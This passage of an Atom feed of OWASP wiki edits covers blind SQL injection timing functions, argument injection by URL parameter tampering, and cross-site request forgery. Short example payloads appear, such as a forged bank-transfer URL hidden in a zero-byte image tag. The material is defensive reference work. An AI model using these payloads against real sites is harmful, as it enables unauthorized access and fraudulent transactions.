&amp;lt;/pre&amp;gt;&lt;br /&gt;
Using this method for the rest of characters it's possible to get to know entire password stored in the database. This method works even when the attacker injects the sql queries and the content of the vulnerable page is doesn't change.&lt;br /&gt;
&lt;br /&gt;
Obviously in this example the names of the tables and the number of columns was specified. However it's possible to guess them or check with trial and error method.&lt;br /&gt;
&lt;br /&gt;
Different databases than MySQL also have implemented functions, which allow to use timing attacks:&lt;br /&gt;
* MS SQL 'WAIT FOR DELAY '0:0:10''&lt;br /&gt;
* PostgreSQL - pg_sleep()&lt;br /&gt;
&lt;br /&gt;
Conducting Blind_SQL_Injection attacks manually are very time taking. There are a lot of tools, which automates this process. One of them is SQLMap (http://sqlmap.sourceforge.net/) developed within OWASP grant program. In the other hand the practice shows that tools of this kind are very sensitive to even small deviations from the rule. This includes:&lt;br /&gt;
* scanning othe WWW cluster, where clocks are not ideally synchronized,&lt;br /&gt;
* WWW services where argument acquiring method was changed, e.g.  from /index.php?ID=10 to /ID,10&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Threat Agents]]==&lt;br /&gt;
&lt;br /&gt;
* [[:Category:Command Execution]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Attacks]]==&lt;br /&gt;
&lt;br /&gt;
* [[Blind_XPath_Injection]]&lt;br /&gt;
* [[SQL_Injection]]&lt;br /&gt;
* [[XPATH_Injection]]&lt;br /&gt;
* [[LDAP_injection]]&lt;br /&gt;
* [[Server-Side_Includes_%28SSI%29_Injection]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Vulnerabilities]]==&lt;br /&gt;
&lt;br /&gt;
* [[Injection_problem]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Controls]]==&lt;br /&gt;
&lt;br /&gt;
* [[:Category:Input Validation]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
* http://www.cgisecurity.com/questions/blindsql.shtml&lt;br /&gt;
* http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html&lt;br /&gt;
* http://www.securitydocs.com/library/2651&lt;br /&gt;
* http://seclists.org/bugtraq/2005/Feb/0288.html&lt;br /&gt;
* http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/&lt;br /&gt;
&lt;br /&gt;
'''Online Resources'''&lt;br /&gt;
* [http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf more Advanced SQL Injection] - by NGS&lt;br /&gt;
* [http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-hotchkies/bh-us-04-hotchkies.pdf Blind SQL Injection Automation Techniques] - Black Hat Pdf&lt;br /&gt;
* [http://seclists.org/lists/bugtraq/2005/Feb/0288.html Blind Sql-Injection in MySQL Databases]&lt;br /&gt;
* [http://www.cgisecurity.com/questions/blindsql.shtml Cgisecurity.com: What is Blind SQL Injection?]&lt;br /&gt;
* [http://www.securitydocs.com/library/2651 Blind SQL Injection]&lt;br /&gt;
* http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf&lt;br /&gt;
* http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html&lt;br /&gt;
* [http://wcsc.myweb.usf.edu/tutorials/SQL_Injection.ppt SQL Injection Attacks]&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&lt;br /&gt;
* [http://www.sqlpowerinjector.com/ SQL Power Injector]&lt;br /&gt;
* [http://www.0x90.org/releases/absinthe/ [Absinthe :: Automated Blind SQL Injection] // ver1.3.1&lt;br /&gt;
* [http://www.securiteam.com/tools/5IP0L20I0E.html SQLBrute - Multi Threaded Blind SQL Injection Bruteforcer] in Python&lt;br /&gt;
* [http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project SQLiX - SQL Injection Scanner] in Perl&lt;br /&gt;
* [http://sqlmap.sourceforge.net sqlmap, a blind SQL injection tool] in Python&lt;br /&gt;
* [http://www.514.es/2006/12/inyeccion_de_codigo_bsqlbf12th.html bsqlbf, a blind SQL injection tool] in Perl&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Injection]]&lt;/div&gt;</summary>
		<author><name>Thiagoalz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;diff=31494</id>
		<title>Argument Injection or Modification</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;diff=31494"/>
				<updated>2008-06-15T15:56:05Z</updated>
		
		<summary type="html">&lt;p&gt;Thiagoalz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Argument Injection or Modification is a specific case of attack, which belongs to Injection attacks familly. Modifying or injecting data as arguments the attacker may lead to very simmilar, often the same results as in other injection attacks. It plays no difference if the attacker wants to inject the system command into argument or into any other part of the code.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Risk Factors==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
===Example 1===&lt;br /&gt;
&lt;br /&gt;
Knowing pseudo code of the application the attacker may guess, what action is required by the application to perform another one. E.g. what must be done to authorize the attacker as the administrator.&lt;br /&gt;
&lt;br /&gt;
Reading the code below the attacker doesn't know the values of $pass and $login. The question is - is there possiblity of altering value of $authorized not knowing previously mentioned variables?&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$authorized=0;&lt;br /&gt;
&lt;br /&gt;
if($pass = &amp;quot;XXX&amp;quot; and $login = &amp;quot;XXX&amp;quot;) { $authorized = 1; }&lt;br /&gt;
if($authorized == 1) { admin_panel(); }&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If server configuration allows for that, we may try to pass argument $authorized=1 as input data to application.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
E.g. /index.php?user=&amp;amp;pass=&amp;amp;authorized=1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Example 2===&lt;br /&gt;
&lt;br /&gt;
If security mechanism doesn't protect data as it should, e.g. doesn't check the identity of the user and private data are displayed to him despite of fact they shouldn't, then such user may try to alter arguments and get access to data owned by a different user.&lt;br /&gt;
&lt;br /&gt;
E.g. By entering address http://testsite.com/index.php?invoice=12 user is able to check one of his invoices. Modifying &amp;quot;invoice&amp;quot; argument, considering above assumptions, the attacker may try to access other user's invoices. Usefull to the attacker in this example would be performing a brute-force attack.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Threat Agents]]==&lt;br /&gt;
&lt;br /&gt;
* [[:Category:Command Execution]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Attacks]]==&lt;br /&gt;
&lt;br /&gt;
* [[Command Injection]]&lt;br /&gt;
* [[Code Injection]]&lt;br /&gt;
* [[SQL Injection]]&lt;br /&gt;
* [[LDAP Injection]]&lt;br /&gt;
* [[SSI Injection]]&lt;br /&gt;
* [[XSS]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Vulnerabilities]]==&lt;br /&gt;
&lt;br /&gt;
* [[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Controls]]==&lt;br /&gt;
&lt;br /&gt;
* validation of the format / expected classes of charachetrs / input/output data size&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category: Injection]]&lt;/div&gt;</summary>
		<author><name>Thiagoalz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;diff=31492</id>
		<title>Argument Injection or Modification</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;diff=31492"/>
				<updated>2008-06-15T15:51:42Z</updated>
		
		<summary type="html">&lt;p&gt;Thiagoalz: sorry!&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Argument Injection or Modification is a specific case of attack, which belongs to Injection attacks familly. Modifying or injecting data as arguments the attacker may lead to very simmilar, often the same results as in other injection attacks. It plays no difference if the attacker wants to inject the system command into argument or into any other part of the code.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Risk Factors==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
===Example 1===&lt;br /&gt;
&lt;br /&gt;
Knowing pseudo code of the application the attacker may guess, what action is required by the application to perform another one. E.g. what must be done to authorize the attacker as the administrator.&lt;br /&gt;
&lt;br /&gt;
Reading the code below the attacker doesn't know the values of $pass and $login. The question is - is there possiblity of altering value of $authorized not knowing previously mentioned variables?&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$authorized=0;&lt;br /&gt;
&lt;br /&gt;
if($pass = &amp;quot;XXX&amp;quot; and $login = &amp;quot;XXX&amp;quot;) { $authorized = 1; }&lt;br /&gt;
if($authorized == 1) { admin_panel(); }&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If server configuration allows for that, we may try to pass argument $authorized=1 as input data to application.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
E.g. /index.php?user=&amp;amp;pass=&amp;amp;authorized=1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Example 2===&lt;br /&gt;
&lt;br /&gt;
If security mechanism doesn't protect data as it should, e.g. doesn't check the identity of the user and private data are displayed to him despite of fact they shouldn't, then such user may try to alter arguments and get access to data owned by a different user.&lt;br /&gt;
&lt;br /&gt;
E.g. By entering address http://testsite.com/index.php?invoice=12 user is able to check one of his invoices. Modifying &amp;quot;invoice&amp;quot; argument, considering above assumptions, the attacker may try to access other user's invoices. Usefull to the attacker in this example would be performing a brute-force attack.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Threat Agents]]==&lt;br /&gt;
&lt;br /&gt;
* [[Command Execution]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Attacks]]==&lt;br /&gt;
&lt;br /&gt;
* [[Command Injection]]&lt;br /&gt;
* [[Code Injection]]&lt;br /&gt;
* [[SQL Injection]]&lt;br /&gt;
* [[LDAP Injection]]&lt;br /&gt;
* [[SSI Injection]]&lt;br /&gt;
* [[XSS]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Vulnerabilities]]==&lt;br /&gt;
&lt;br /&gt;
* [[Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Controls]]==&lt;br /&gt;
&lt;br /&gt;
* validation of the format / expected classes of charachetrs / input/output data size&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category: Injection]]&lt;/div&gt;</summary>
		<author><name>Thiagoalz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;diff=31491</id>
		<title>Argument Injection or Modification</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;diff=31491"/>
				<updated>2008-06-15T15:50:42Z</updated>
		
		<summary type="html">&lt;p&gt;Thiagoalz: adjustments to new template&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Argument Injection or Modification is a specific case of attack, which belongs to Injection attacks familly. Modifying or injecting data as arguments the attacker may lead to very simmilar, often the same results as in other injection attacks. It plays no difference if the attacker wants to inject the system command into argument or into any other part of the code.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Risk Factors==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
===Example 1===&lt;br /&gt;
&lt;br /&gt;
Knowing pseudo code of the application the attacker may guess, what action is required by the application to perform another one. E.g. what must be done to authorize the attacker as the administrator.&lt;br /&gt;
&lt;br /&gt;
Reading the code below the attacker doesn't know the values of $pass and $login. The question is - is there possiblity of altering value of $authorized not knowing previously mentioned variables?&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$authorized=0;&lt;br /&gt;
&lt;br /&gt;
if($pass = &amp;quot;XXX&amp;quot; and $login = &amp;quot;XXX&amp;quot;) { $authorized = 1; }&lt;br /&gt;
if($authorized == 1) { admin_panel(); }&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If server configuration allows for that, we may try to pass argument $authorized=1 as input data to application.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
E.g. /index.php?user=&amp;amp;pass=&amp;amp;authorized=1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Example 2===&lt;br /&gt;
&lt;br /&gt;
If security mechanism doesn't protect data as it should, e.g. doesn't check the identity of the user and private data are displayed to him despite of fact they shouldn't, then such user may try to alter arguments and get access to data owned by a different user.&lt;br /&gt;
&lt;br /&gt;
E.g. By entering address http://testsite.com/index.php?invoice=12 user is able to check one of his invoices. Modifying &amp;quot;invoice&amp;quot; argument, considering above assumptions, the attacker may try to access other user's invoices. Usefull to the attacker in this example would be performing a brute-force attack.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Threat Agents]]==&lt;br /&gt;
&lt;br /&gt;
* [[Category:Command Execution]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Attacks]]==&lt;br /&gt;
&lt;br /&gt;
* [[Command Injection]]&lt;br /&gt;
* [[Code Injection]]&lt;br /&gt;
* [[SQL Injection]]&lt;br /&gt;
* [[LDAP Injection]]&lt;br /&gt;
* [[SSI Injection]]&lt;br /&gt;
* [[XSS]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Vulnerabilities]]==&lt;br /&gt;
&lt;br /&gt;
* [[Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Controls]]==&lt;br /&gt;
&lt;br /&gt;
* validation of the format / expected classes of charachetrs / input/output data size&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category: Injection]]&lt;/div&gt;</summary>
		<author><name>Thiagoalz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;diff=30209</id>
		<title>Cross-Site Request Forgery</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;diff=30209"/>
				<updated>2008-06-03T15:34:23Z</updated>
		
		<summary type="html">&lt;p&gt;Thiagoalz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{template:CandidateForDeletion}}&lt;br /&gt;
#REDIRECT [[Cross-Site Request Forgery (CSRF)]]&lt;/div&gt;</summary>
		<author><name>Thiagoalz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Cross-Site_Request_Forgery_(CSRF)&amp;diff=30207</id>
		<title>Cross-Site Request Forgery (CSRF)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Cross-Site_Request_Forgery_(CSRF)&amp;diff=30207"/>
				<updated>2008-06-03T15:33:12Z</updated>
		
		<summary type="html">&lt;p&gt;Thiagoalz: Cross-Site Request Forgery moved to Cross-Site Request Forgery (CSRF) over redirect: Changing the title&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, like change the victim's e-mail address, home address, or password, or purchase something. CSRF attacks generally target functions that cause a state change on the server but can also be used to access sensitive data.&lt;br /&gt;
&lt;br /&gt;
For most sites, browsers will automatically include with such requests any credentials associated with the site, such as the user's session cookie, basic auth credentials, IP address, Windows domain credentials, etc.  Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish this from a legitimate user request.&lt;br /&gt;
&lt;br /&gt;
In this way, the attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, change account information, retrieve account information, or any other function provided by the vulnerable website.&lt;br /&gt;
&lt;br /&gt;
Sometimes, it is possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called Stored CSRF flaws. This can be accomplished by simply storing an IMG or IFRAME tag in a field that accepts HTML, or by a more complex cross-site scripting attack. If the attack can store a CSRF attack in the site, the severity of the attack is amplified. In particular, the likelihood is increased because the victim is more likely to view the page containing the attack than some random page on the Internet.  The likelihood is also increased because the victim is sure to be authenticated to the site already.&lt;br /&gt;
&lt;br /&gt;
Synonyms: CSRF attacks are also known by a number of other names, including XSRF, &amp;quot;Sea Surf&amp;quot;, Session Riding, Cross-Site Reference Forgery, Hostile Linking. Microsoft refers to this type of attack as a One-Click attack in their threat modeling process and many places in their online documentation.&lt;br /&gt;
&lt;br /&gt;
==Examples==&lt;br /&gt;
&lt;br /&gt;
'''How does the attack work?'''&lt;br /&gt;
&lt;br /&gt;
There are numerous ways in which an end-user can be tricked into loading information from or submitting information to a web application. In order to execute an attack, we must first understand how to generate a malicious request for our victim to execute. Let us consider the following example: Alice wishes to transfer $100 to Bob using bank.com. The request generated by Alice will look similar to the following:&lt;br /&gt;
&lt;br /&gt;
 POST &amp;lt;nowiki&amp;gt;http://bank.com/transfer.do&amp;lt;/nowiki&amp;gt; HTTP/1.1&lt;br /&gt;
 ...&lt;br /&gt;
 ...&lt;br /&gt;
 ...&lt;br /&gt;
 Content-Length: 19;&lt;br /&gt;
 &lt;br /&gt;
 acct=BOB&amp;amp;amount=100&lt;br /&gt;
&lt;br /&gt;
However, Maria notices that the same web application will execute the same transfer using URL parameters as follows:&lt;br /&gt;
&lt;br /&gt;
 GET &amp;lt;nowiki&amp;gt;http://bank.com/transfer.do?acct=BOB&amp;amp;amount=100&amp;lt;/nowiki&amp;gt; HTTP/1.1&lt;br /&gt;
&lt;br /&gt;
Maria now decides to exploit this web application vulnerability using Alice as her victim. Maria first constructs the following URL which will transfer $100,000 from Alice's account to her account:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://bank.com/transfer.do?acct=MARIA&amp;amp;amount=100000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now that her malicious request is generated, Maria must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;a href=&amp;quot;http://bank.com/transfer.do?acct=MARIA&amp;amp;amount=100000&amp;quot;&amp;gt;View my Pictures!&amp;lt;/a&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Assuming Alice is authenticated with the application when she clicks the link, the transfer of $100,000 to Maria's account will occur. However, Maria realizes that if Alice clicks the link, then Alice will notice that a transfer has occurred. Therefore, Maria decides to hide the attack in a zero-byte image:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;img src=&amp;quot;http://bank.com/transfer.do?acct=MARIA&amp;amp;amount=100000&amp;quot; width=&amp;quot;1&amp;quot; height=&amp;quot;1&amp;quot; border=&amp;quot;0&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If this image tag were included in the email, Alice would only see a little box indicating that the browser could not render the image. However, the browser ''will still'' submit the request to bank.com without any visual indication that the transfer has taken place.&lt;br /&gt;
&lt;br /&gt;
==Prevention measures that do '''NOT''' work==&lt;br /&gt;
&lt;br /&gt;
;Using a secret cookie&lt;br /&gt;
:Remember that all cookies, even the ''secret'' ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.&lt;br /&gt;
&lt;br /&gt;
;Only accepting POST requests&lt;br /&gt;
:Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request. The two most common methods are through the use of phishing sites (sites which appear to look like another valid site) and through the use of XMLHTTPRequest in a Cross-Site Scripting attack.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Client-side Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
[[XSS]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
* Add a per-request nonce to URL and all forms in addition to the standard session. This is also referred to as &amp;quot;form keys&amp;quot;. Many frameworks (ex, Drupal.org 4.7.4+) either have or are starting to include this type of protection &amp;quot;built-in&amp;quot; to every form so the programmer does not need to code this protection manually. &lt;br /&gt;
* TBD: Add a per-session nonce to URL and all forms&lt;br /&gt;
* TBD: Add a hash(session id, function name, server-side secret) to URL and all forms&lt;br /&gt;
* TBD: .NET - add session identifier to ViewState with MAC&lt;br /&gt;
* Checking HTTP referrer details can help mitigate the attack but does certainly not provide a bullet proof solution. By ensuring the HTTP posts have come from the original site means that the attacks from other sites will not function. However, if the CSRF attack was used in combination with XSS on the original site then this mechanism will not provide any protection.&lt;br /&gt;
* &amp;quot;Although cross-site request forgery is fundamentally a problem with the web application, not the user, users can help protect their accounts at poorly designed sites by logging off the site before visiting another, or clearing their browser's cookies at the end of each browser session.&amp;quot; -http://en.wikipedia.org/wiki/Cross-site_request_forgery#_note-1&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
; [http://www.cgisecurity.com/articles/csrf-faq.shtml The Cross-Site Request Forgery (CSRF/XSRF) FAQ]&lt;br /&gt;
: ''quote: &amp;quot;This paper serves as a living document for Cross-Site Request Forgery issues. This document will serve as a repository of information from existing papers, talks, and mailing list postings and will be updated as new information is discovered.&amp;quot;''&lt;br /&gt;
&lt;br /&gt;
; [[Testing for CSRF]]&lt;br /&gt;
: CSRF (aka Session riding) paper from the OWASP Testing Guide project (need to integrate)&lt;br /&gt;
&lt;br /&gt;
; [http://www.darkreading.com/document.asp?doc_id=107651&amp;amp;WT.svl=news1_2 CSRF Vulnerability: A 'Sleeping Giant']&lt;br /&gt;
: Overview Paper&lt;br /&gt;
&lt;br /&gt;
; [http://www.owasp.org/index.php/Image:OWASPAppSecEU2006_RequestRodeo.ppt RequestRodeo: Client Side Protection against Session Riding]&lt;br /&gt;
: Martin Johns and Justus Winter's interesting paper and presentation for the 4th OWASP AppSec Conference which described potential techniques that browsers could adopt to automatically provide CSRF protection - [http://www.owasp.org/index.php/Image:RequestRodeo-MartinJohns.pdf PDF paper]&lt;br /&gt;
&lt;br /&gt;
; [http://www.owasp.org/index.php/CSRF_Guard CSRF Guard]&lt;br /&gt;
: A J2EE Filter which appends a unique request token to each form and link in the HTML response&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Attack]]&lt;br /&gt;
[[Category:Exploitation of Authentication]]&lt;/div&gt;</summary>
		<author><name>Thiagoalz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;diff=30208</id>
		<title>Cross-Site Request Forgery</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;diff=30208"/>
				<updated>2008-06-03T15:33:12Z</updated>
		
		<summary type="html">&lt;p&gt;Thiagoalz: Cross-Site Request Forgery moved to Cross-Site Request Forgery (CSRF) over redirect: Changing the title&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;#REDIRECT [[Cross-Site Request Forgery (CSRF)]]&lt;/div&gt;</summary>
		<author><name>Thiagoalz</name></author>	</entry>

	</feed>